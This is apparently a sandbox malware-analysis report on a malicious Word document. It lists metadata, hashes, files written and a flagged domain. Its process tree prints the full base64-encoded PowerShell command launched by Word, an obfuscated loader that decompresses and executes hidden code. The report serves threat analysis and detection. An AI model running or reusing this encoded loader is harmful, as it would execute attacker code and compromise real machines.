File name: | 93f37b629080399807dcce3cd574979808934046919d9ec8e1cb69866eb03725 |
Full analysis: | https://app.any.run/tasks/12317a05-bc41-4065-b867-c30e02346605 |
Verdict: | Malicious activity |
Analysis date: | July 11, 2019, 18:10:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: ltldxtupshyydpocr, Subject: xofugbmtjngph, Author: dllxgjfczrnpou, Comments: jaxzlpkqjvsqilcmlpvgqfgrmk, Template: Normal, Last Saved By: Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Wed Jul 3 09:17:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 30AC536981ACDF9E5F6E0B23BCF3CA97 |
SHA1: | 70201DCE15E7B4AD9FB637FFBBF9F9108D97C28C |
SHA256: | 93F37B629080399807DCCE3CD574979808934046919D9EC8E1CB69866EB03725 |
SSDEEP: | 768:5oN0QtczgxBgLcCK7WwifzA97g4QvLAHBV3h4P3yVDBZxz99j3nPE1Jp:5oNzjgLNadi8979QmBV3evyVDD3lngJ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Bytes: | 23552 |
Company: | djgjdzapcrorcyhfkbqtbqw |
Manager: | rtbg |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:07:03 08:17:00 |
CreateDate: | 2018:04:19 18:59:00 |
TotalEditTime: | 3.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 11 |
LastModifiedBy: | Пользователь Windows |
Template: | Normal |
Comments: | jaxzlpkqjvsqilcmlpvgqfgrmk |
Keywords: | - |
Author: | dllxgjfczrnpou |
Subject: | xofugbmtjngph |
Title: | ltldxtupshyydpocr |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3076 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\93f37b629080399807dcce3cd574979808934046919d9ec8e1cb69866eb03725.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2552 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enco IAAoACAALgAoACcATgBFAFcAJwArACcALQBvAGIAJwArACcASgAnACsAJwBFAGMAVAAnACkAIAAgAFMAWQBTAHQARQBNAGAALgBpAG8AYAAuAGMATwBtAFAAcgBgAEUAYABzAFMAaQBPAGAATgAuAGQARQBgAEYAbABhAFQAZQBgAFMAdAByAGUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBlADYANABzAFQAUgBpAG4ARwAoACcAUgBZAC8AQgBiAG8ASgBBAEcASQBUAHYAVABmAG8ATwBlADYAQgBaAEMASABWAEoAbABLAFkAVwBRAHAAcABXAGwASgBBADAAYQBDAHkAMgBoADcAYQBKAFMASAA5AGsASwA3AEoAYgBkAGgARwBWADgATwA3AGQAZwA5AFgATAB6AEcAVgBtADgAbwAxAEcAMwA5AGoAdwAvAHIAbABHAEgAcwBMAGIAWQBMAEoAUABzAEsAcwBGADYAWABRAFIASgB4AE4AUABnADMATABuADEAQQBJAHEAWAByAEcATQBGAG0ARABpAFQAMgB4AHEAcAA0AEsASgBDAGUAeABCAHAAWgBtAGQAUABTAHkAKwBQAGEATABqAEUAcABzAFkAbQBoADUAVAB0AHYAcQBCAFYARwBJAEQAUgBiAEMATQBsADYAUwBCADEAWABMADAAUQBpAEcASwBYAFcAMQBYAHoALwAzAHAAMAAzAEgAawA0AFYAeABLADcAbABpAFcAWgBLAHcANAA5AHYAdgBsAEgAYQBGAGwAeABpAHoAYQAvAEYAbwBOAEYAeAB2AEMAYwAvADUAWQBlAEIAawBjAEIAbQBRAGoATQBCAEcAOABvAEYATABIAE4AOQBoAHcATQAxAFoAQgBrAHUAYQA2AEYAcwA3ADQAMQBvADcAbwBPADYASQBsAE8AZwA4AGIAcgBhAHcATwA3AFEAbQBMACsASwB5AEoAQwBwAGIANABXAFYAaQBNAEwANABWAGIAOQBIAC8AUwBjAE0ATQBNADYAYgBxAGkARAAwAEQAMgBRAG8AVQB1AFEAYwBsAFcAcwBaADgAagBwAEIAaABIAGcAYwB4AFIAYgB3ADIAbwBiAHcAKwBHAHQAbwBIAGEARAA1ADgAbQA2ADUASQBKAFMAVgBOAEIAWgBoAFYATABRAFkAZwB2AHgAMwBtAE4AawA3AG4AVQBMACsATQByAFIAYgBwAHgAdQB5ADUATgBaAEoAcQAzAFgAWABkADkAOQBRAGMAPQAnACkAIAAsAFsAcwBZAHMAVABlAG0ALgBpAG8ALgBjAE8ATQBwAFIAZQBTAHMAaQBPAE4ALgBDAG8AbQBwAHIARQBTAFMASQBPAE4AbQBPAGQAZQBdADoAOgBEAEUAQwBvAG0AcAByAGUAUwBTACAAKQB8ACYAKAAnAGYAJwArACcAbwByAGUAJwArACcAYQBjAEgAJwApAHsAIAAmACgAJwBOAEUAVwAtAG8AYgAnACsAJwBKACcAKwAnAEUAYwBUACcAKQAgACAAaQBgAG8ALgBgAFMAYABUAHIAZQBhAG0AUgBlAGEAZABlAFIAKAAkAF8ALABbAHMAeQBTAFQAZQBtAC4AVABFAHgAVAAuAEUATgBjAG8AZABJAG4ARwBdADoAOgBhAHMAQwBpAGkAKQAgAH0AfAAuACgAJwBGAG8AcgBFAGEAJwArACcAQwAnACsAJwBIACcAKQB7ACQAXwAuAHIAZQBhAEQAdABvAGUATgBkACgAKQAgAH0AIAApACAAfAAuACgAJwBJACcAKwAnAGUAeAAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3076 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB2D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2552 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D1SG1R3MFKBG0FDF44RT.temp | — | |
MD5:— | SHA256:— | |||
2552 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
3076 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:502C188EFFDB19D1D5A7F9068CB8D2B7 | SHA256:7F961E3BA098F75256992569DE14015481AE680B5DB8A2F04B230C9805F59E03 | |||
2552 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1014a3.TMP | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
3076 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:4ADF3240368756EBF03FA12516E6EE70 | SHA256:30A1195C20C88DC34FF1A9F9C6D28D63E9A24C7EBF62FA23FACB982B8C6655A9 | |||
3076 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$f37b629080399807dcce3cd574979808934046919d9ec8e1cb69866eb03725.doc | pgc | |
MD5:4CF76577F46193E560274FAD085B9906 | SHA256:CB9C8803BADAA6DF86B819144B83F985C1C1E5DF039DCFC644008199972731B5 |
Domain | IP | Reputation |
---|---|---|
toolz22n5.info |
| malicious |